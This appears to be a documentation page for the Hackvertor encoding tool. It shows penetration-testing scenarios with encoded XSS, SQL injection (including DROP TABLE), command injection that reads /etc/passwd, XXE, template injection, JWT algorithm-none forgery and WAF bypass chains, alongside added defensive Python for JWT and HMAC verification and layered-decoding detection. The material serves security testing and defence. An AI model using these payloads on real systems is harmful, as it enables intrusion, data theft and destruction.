Security Testing Examples
Practical examples of using Hackvertor for common security testing scenarios.
Scenario: Testing for XSS where input is HTML encoded.
Payload:
<@html_entities><script>alert(1)</script></@html_entities>
Result: &lt;script&gt;alert(1)&lt;/script&gt;
Scenario: Application decodes twice.
<@urlencode><@urlencode><script>alert(1)</script></@urlencode></@urlencode>
Scenario: XSS via data: URI.
<@base64><script>alert(document.domain)</script></@base64>
Use in: <a href="data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ+">click</a>
Scenario: Filter bypasses using Unicode.
<@unicode_escapes>alert</@unicode_escapes>
Result: \u0061\u006c\u0065\u0072\u0074
<@hex_entities><img src=x onerror=alert(1)></@hex_entities>
Scenario: WAF blocks plain SQL keywords.
<@urlencode>' OR 1=1--</@urlencode>
<@sql_hex>admin</@sql_hex>
Result: 0x61646d696e
<@urlencode><@urlencode>' UNION SELECT * FROM users--</@urlencode></@urlencode>
Some applications decode Base64 parameters:
<@base64>'; DROP TABLE users;--</@base64>
Set up test credentials:
Variable: username = admin
Variable: password = <@range(1,1000,1)></@range>
Decode JWT payload:
<@jwt_get_payload>eyJhbGciOiJIUzI1NiIs...</@jwt_get_payload>
Create new JWT:
<@jwt('HS256','weak_secret')>{"sub":"admin","role":"admin"}</@jwt>
Try algorithm none:
<@jwt('NONE','')>{"sub":"admin"}</@jwt>
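The two JWT scenarios above (a token minted with a weak HS256 secret, and an unsigned token with the algorithm set to none) are best read next to the check a server should be running. The following Python is an added example, not part of Hackvertor or this wiki: it mints an HS256 token with the page's payload, builds an unsigned alg none token like the <@jwt('NONE','')> tag does, and verifies tokens against an algorithm allowlist so the alg field in the header is never trusted. The secret weak_secret and the payloads are taken from the page; the function names are assumptions.

```python
import base64
import hashlib
import hmac
import json


def b64url(data: bytes) -> str:
    """Base64url without padding, as used in JWTs."""
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def b64url_decode(text: str) -> bytes:
    """Base64url decode, restoring the padding JWTs strip."""
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def jwt_hs256_sign(payload: dict, secret: str) -> str:
    """Mint an HS256 token, equivalent to <@jwt('HS256', secret)> on the page."""
    header = b64url(json.dumps({"alg": "HS256", "typ": "JWT"}, separators=(",", ":")).encode())
    body = b64url(json.dumps(payload, separators=(",", ":")).encode())
    signing_input = (header + "." + body).encode()
    sig = hmac.new(secret.encode(), signing_input, hashlib.sha256).digest()
    return header + "." + body + "." + b64url(sig)


def jwt_unsigned(payload: dict) -> str:
    """An alg none token with an empty signature, the shape the <@jwt('NONE','')> tag produces."""
    header = b64url(b'{"alg":"none","typ":"JWT"}')
    body = b64url(json.dumps(payload, separators=(",", ":")).encode())
    return header + "." + body + "."


def jwt_verify(token: str, secret: str, allowed_algs=("HS256",)):
    """Return the payload dict if the token is valid, else None.

    The algorithm comes from a server-side allowlist; whatever the header
    claims ("none", "NONE", an asymmetric alg) is only checked against it.
    """
    parts = token.split(".")
    if len(parts) != 3:
        return None
    header_b64, body_b64, sig_b64 = parts
    try:
        header = json.loads(b64url_decode(header_b64))
        given_sig = b64url_decode(sig_b64)
    except (ValueError, UnicodeDecodeError):
        return None
    if not isinstance(header, dict) or header.get("alg") not in allowed_algs:
        return None  # rejects unsigned tokens and algorithm substitution outright
    expected_sig = hmac.new(secret.encode(), (header_b64 + "." + body_b64).encode(),
                            hashlib.sha256).digest()
    if not hmac.compare_digest(expected_sig, given_sig):  # constant-time compare
        return None
    try:
        return json.loads(b64url_decode(body_b64))
    except (ValueError, UnicodeDecodeError):
        return None


if __name__ == "__main__":
    token = jwt_hs256_sign({"sub": "admin", "role": "admin"}, "weak_secret")
    print(token)
    print(jwt_verify(token, "weak_secret"))            # payload
    print(jwt_verify(jwt_unsigned({"sub": "admin"}), "weak_secret"))  # None
```

The verifier only ever computes HS256, so a token whose header says none, or whose body was swapped between two tokens, fails before any claim is read.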
Basic Auth header:
Authorization: Basic <@base64><@get_username/>:<@get_password/></@base64>
URL encoded:
<@urlencode>; cat /etc/passwd</@urlencode>
<@hex_escapes>|ls -la</@hex_escapes>
For systems that decode Base64:
<@base64>; whoami</@base64>
<@base64><?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xxe;</foo></@base64>
<@urlencode_all><?xml version="1.0"?><!DOCTYPE test [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><test>&xxe;</test></@urlencode_all>
<@urlencode>{{7*7}}</@urlencode>
<@urlencode>${7*7}</@urlencode>
<@urlencode><%= 7*7 %></@urlencode>
<@hex_entities>{{constructor.constructor('return this')()}}</@hex_entities>
Using HMAC for API signatures:
<@hmac_sha256('<@get_api_secret/>')><@context_body/></@hmac_sha256>
X-Timestamp: <@timestamp/>
X-Request-Hash: <@sha256><@context_body/></@sha256>
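The HMAC signature, X-Timestamp and X-Request-Hash headers above only mean something if the receiving side checks them properly. The Python below is an added example, not part of Hackvertor or this wiki, showing the server half: the timestamp is bound into the signed data so a captured request cannot be replayed after the window closes, and the comparison is constant-time. It also shows why an unkeyed SHA-256 of the body (X-Request-Hash) is an integrity check only: anyone can recompute it, so authenticity needs the keyed HMAC. The header names are the page's; the window size, secret and function names are assumptions, and the request body is constructed.

```python
import hashlib
import hmac
import time

SIGNATURE_WINDOW_SECONDS = 300  # assumed replay window


def sign_request(body: bytes, timestamp: int, api_secret: bytes) -> str:
    """HMAC-SHA256 over "<timestamp>.<body>", hex encoded.

    Signing the body alone would let a captured request be replayed forever;
    including the timestamp ties the signature to a short validity window.
    """
    message = str(timestamp).encode() + b"." + body
    return hmac.new(api_secret, message, hashlib.sha256).hexdigest()


def body_hash(body: bytes) -> str:
    """Unkeyed SHA-256 of the body (X-Request-Hash). Detects corruption, not forgery."""
    return hashlib.sha256(body).hexdigest()


def verify_request(body: bytes, headers: dict, api_secret: bytes, now=None) -> bool:
    """Accept only a fresh, correctly signed request."""
    now = int(time.time()) if now is None else now
    try:
        timestamp = int(headers.get("X-Timestamp", ""))
    except ValueError:
        return False
    if abs(now - timestamp) > SIGNATURE_WINDOW_SECONDS:
        return False  # stale or far-future timestamp: likely replay or clock abuse
    expected = sign_request(body, timestamp, api_secret)
    given = headers.get("X-Signature", "")
    # compare_digest avoids leaking how many leading bytes matched
    return hmac.compare_digest(expected.encode(), given.encode())


if __name__ == "__main__":
    secret = b"constructed-api-secret"
    body = b'{"amount":5}'
    ts = int(time.time())
    headers = {
        "X-Timestamp": str(ts),
        "X-Signature": sign_request(body, ts, secret),
        "X-Request-Hash": body_hash(body),
    }
    print(verify_request(body, headers, secret))            # True
    print(verify_request(b'{"amount":500}', headers, secret))  # False: body changed
```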
Generate all URL encoded characters:
<@urlencode_all><@range(0,255,1)></@range></@urlencode_all>
<@random_alphanum_mixed(32)></@random_alphanum_mixed>
<@set_variable1(false)>payload</@set_variable1>
Test 1: <@base64><@get_variable1/></@base64>
Test 2: <@urlencode><@get_variable1/></@urlencode>
Test 3: <@hex><@get_variable1/></@hex>
<@base64><@urlencode><@base64>payload</@base64></@urlencode></@base64>
<@html_entities><@urlencode><@base64><script>alert(1)</script></@base64></@urlencode></@html_entities>
Use Multi Encoder (Ctrl+Alt+M):
- Enter payload
- Select multiple encodings in Layer 1
- Add Layer 2 with more encodings
- Review all combinations
- Test promising results
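Every scenario on this page that chains encoders (the double URL decode, Base64 inside URL encoding, hex and HTML entities in front of a filter) works only because some layer on the receiving side decodes more than the layer in front of it inspects. The Python below is an added example, not part of Hackvertor or this wiki: it is the Smart Decode idea turned into detection logic, peeling URL encoding, HTML entities, Base64 and hex off a value until nothing changes, then matching a small signature set against the fully decoded form rather than the raw one. The Base64 and hex steps are heuristics (valid charset, length, printable UTF-8 result), which is labelled in the code; the signature patterns, function names and sample inputs are constructed.

```python
import base64
import binascii
import html
import re
from urllib.parse import unquote

MAX_LAYERS = 10
B64_RE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")
HEX_RE = re.compile(r"^(?:[0-9a-fA-F]{2})+$")
# Constructed signature set; a real ruleset would be far larger
SUSPICIOUS_RE = re.compile(r"<script|onerror\s*=|union\s+select|\{\{.*\}\}|<!entity", re.I)


def as_text(raw: bytes):
    """Return raw as str if it is printable UTF-8, else None (filters Base64/hex false positives)."""
    try:
        text = raw.decode("utf-8")
    except UnicodeDecodeError:
        return None
    if all(ch.isprintable() or ch in "\r\n\t" for ch in text):
        return text
    return None


def peel_one_layer(value: str):
    """Apply the first decoder that changes the value; return (layer_name, decoded) or None."""
    if "%" in value:
        decoded = unquote(value)
        if decoded != value:
            return ("url", decoded)
    if "&" in value:
        decoded = html.unescape(value)
        if decoded != value:
            return ("html_entities", decoded)
    stripped = value.strip()
    # Heuristic: Base64 only if charset, length and decoded text all look right
    if len(stripped) >= 8 and len(stripped) % 4 == 0 and B64_RE.match(stripped):
        try:
            decoded = as_text(base64.b64decode(stripped, validate=True))
        except binascii.Error:
            decoded = None
        if decoded is not None and decoded != value:
            return ("base64", decoded)
    # Heuristic: hex only if every byte pair is hex and the result is printable text
    if len(stripped) >= 8 and HEX_RE.match(stripped):
        decoded = as_text(bytes.fromhex(stripped))
        if decoded is not None:
            return ("hex", decoded)
    return None


def decode_layers(value: str, max_layers: int = MAX_LAYERS):
    """Peel encoding layers until a fixed point; return (plain_value, [layer names])."""
    layers = []
    current = value
    for _ in range(max_layers):  # cap prevents pathological inputs from looping
        step = peel_one_layer(current)
        if step is None:
            break
        layers.append(step[0])
        current = step[1]
    return current, layers


def inspect_value(value: str) -> dict:
    """Normalise then match, so signatures see what the application will see."""
    plain, layers = decode_layers(value)
    return {"decoded": plain, "layers": layers, "suspicious": bool(SUSPICIOUS_RE.search(plain))}


if __name__ == "__main__":
    samples = [  # constructed inputs, in the shapes this page's tags produce
        "%253Cscript%253Ealert%25281%2529%253C%252Fscript%253E",   # double URL encoded
        "PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ%2B",  # Base64 then URL encoded
        "61646d696e",                                              # sql_hex of admin
        "&#x3C;img src=x onerror=alert(1)&#x3E;",                  # hex entities
        "hello world",
    ]
    for sample in samples:
        print(inspect_value(sample))
```

The point of the fixed-point loop is that the number of layers is unknown to the defender; matching against the raw value, or after exactly one decode, is what the "application decodes twice" scenario exploits.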
<@gzip_compress>Large payload data here...</@gzip_compress>
<@deflate_compress('dynamic')>payload</@deflate_compress>
MD5: <@md5>password123</@md5>
SHA1: <@sha1>password123</@sha1>
SHA256: <@sha256>password123</@sha256>
Check if hash matches:
<@if_regex('<@sha256>candidate</@sha256>','known_hash','Match','No match')>check</@if_regex>
If you suspect XOR encryption:
<@xor_getkey('known_plaintext')>ciphertext</@xor_getkey>
<@rotN_bruteforce>encrypted_text</@rotN_bruteforce>
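The xor_getkey and rotN_bruteforce tags above encode a point worth seeing in code: a single repeating-key XOR or a letter rotation is obfuscation, not encryption, because a few bytes of known plaintext give back the key and a rotation has only 26 possibilities. The Python below is an added example, not part of Hackvertor or this wiki, implementing both recoveries: the XOR key is read off as ciphertext XOR plaintext and its period is taken as the shortest repeat in that keystream (a heuristic that needs the known plaintext to be longer than the key), and the ROT brute force ranks the 26 candidates by common-word hits. The word list, key and sample texts are constructed; the function names are assumptions.

```python
def xor_apply(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR; the same call encrypts and decrypts."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def xor_recover_key(ciphertext: bytes, known_plaintext: bytes) -> bytes:
    """Recover the key from a known plaintext prefix: key[i] = c[i] ^ p[i].

    The period is the shortest repeat in the recovered keystream, so the
    known plaintext must cover at least one full key repetition; with less,
    the partial keystream is returned as-is.
    """
    stream = bytes(c ^ p for c, p in zip(ciphertext, known_plaintext))
    for period in range(1, len(stream) + 1):
        if all(stream[i] == stream[i % period] for i in range(len(stream))):
            return stream[:period]
    return stream


def rot_n(text: str, n: int) -> str:
    """Rotate ASCII letters by n positions, leaving everything else untouched."""
    out = []
    for ch in text:
        if "a" <= ch <= "z":
            out.append(chr((ord(ch) - ord("a") + n) % 26 + ord("a")))
        elif "A" <= ch <= "Z":
            out.append(chr((ord(ch) - ord("A") + n) % 26 + ord("A")))
        else:
            out.append(ch)
    return "".join(out)


# Constructed scoring words; any small English list works for ranking
COMMON_WORDS = ("the", "and", "password", "user", "admin", "secret", "key")


def rot_bruteforce(text: str):
    """Return all 26 (shift, candidate) pairs, most English-looking first."""
    candidates = [(n, rot_n(text, -n)) for n in range(26)]  # undo a shift of n

    def score(candidate):
        lower = candidate[1].lower()
        return sum(lower.count(word) for word in COMMON_WORDS)

    return sorted(candidates, key=score, reverse=True)


if __name__ == "__main__":
    key = b"k3y"
    plaintext = b"The quick brown fox jumps over the lazy dog"
    ciphertext = xor_apply(plaintext, key)
    print(xor_recover_key(ciphertext, plaintext[:12]))  # b'k3y'
    print(rot_bruteforce(rot_n("the password is admin", 7))[0])  # (7, 'the password is admin')
```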
<@aes_encrypt('1234567890123456','AES/CBC/PKCS5Padding','1234567890123456')>plaintext</@aes_encrypt>
Original ID: <@context_param('id')/>
Encoded: <@base64><@context_param('id')/></@base64>
Original Auth: <@context_header('Authorization')/>
Decoded: <@d_base64><@context_header('Authorization')/></@d_base64>
Request Hash: <@sha256><@context_request/></@sha256>
Custom tag settings: Type: HTTP Handler, Analysis: Request. Code:

```python
import re
import base64  # required by b64encode below

body = request.bodyToString()
# Base64 encode only the password parameter, leaving the rest of the body untouched
body = re.sub(r'password=([^&]+)',
              lambda m: 'password=' + base64.b64encode(m.group(1).encode()).decode(),
              body)
request.withBody(body)
```

Custom tag settings: Type: HTTP Handler, Analysis: Request. Code:

```python
import hashlib

body = request.bodyToString()
# SHA-256 of the request body, attached as an X-Signature header
sig = hashlib.sha256(body.encode()).hexdigest()
request.withHeader('X-Signature', sig)
```

Best practices:
- Start simple: Test single encodings before chaining
- Use Smart Decode: Understand how target decodes data
- Check responses: Verify encoding worked as expected
- Document findings: Note which encodings bypass which controls
- Use variables: Store payloads for consistency
- Multi Encoder: Explore combinations systematically